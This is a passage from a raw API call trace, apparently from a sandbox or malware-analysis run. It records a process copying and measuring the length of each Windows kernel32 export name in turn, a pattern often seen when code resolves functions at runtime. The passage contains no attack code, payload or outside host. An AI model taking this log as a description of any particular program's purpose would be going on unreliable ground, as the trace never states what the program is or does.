(lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.313] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.313] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.313] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.313] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.313] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.313] lstrlenA (lpString="BEEP") returned 4 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.313] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.313] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.313] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.313] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.313] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.313] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.313] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.314] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.314] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.314] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.314] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.314] lstrlenA (lpString="CANCELIO") returned 8 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.314] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.314] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.314] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.314] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.314] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.314] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.314] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.314] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.314] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.314] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.314] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.314] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.314] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.315] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.315] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.315] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.315] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.315] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.315] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.315] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.315] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.315] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.315] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.315] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.315] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.315] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.315] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.315] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.315] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.315] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.315] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.315] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.316] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.316] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.316] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.316] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.316] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.316] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.316] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.316] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.316] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.316] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.316] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.316] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.316] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.316] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.316] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.316] lstrlenA (lpString="COPYFILEA") returned 9 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.316] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.316] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.316] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.317] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.317] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.317] lstrlenA (lpString="COPYFILEW") returned 9 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.317] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.317] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.317] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.317] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.317] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.317] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.317] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.317] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.317] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.317] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.317] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.317] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.317] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.317] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.317] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.317] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.318] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.318] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.318] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.318] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.318] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.318] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.318] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.318] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.318] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.318] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.318] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.318] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.318] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.318] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.318] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.318] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.318] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.318] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.318] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.318] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.319] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.319] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.319] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.319] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.319] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.319] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.319] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.319] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.319] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.319] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.319] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.319] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.319] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.319] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.319] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.319] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.319] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.319] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.319] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.320] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.320] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.320] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.320] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.320] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.320] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.320] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.320] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.320] lstrcpyA 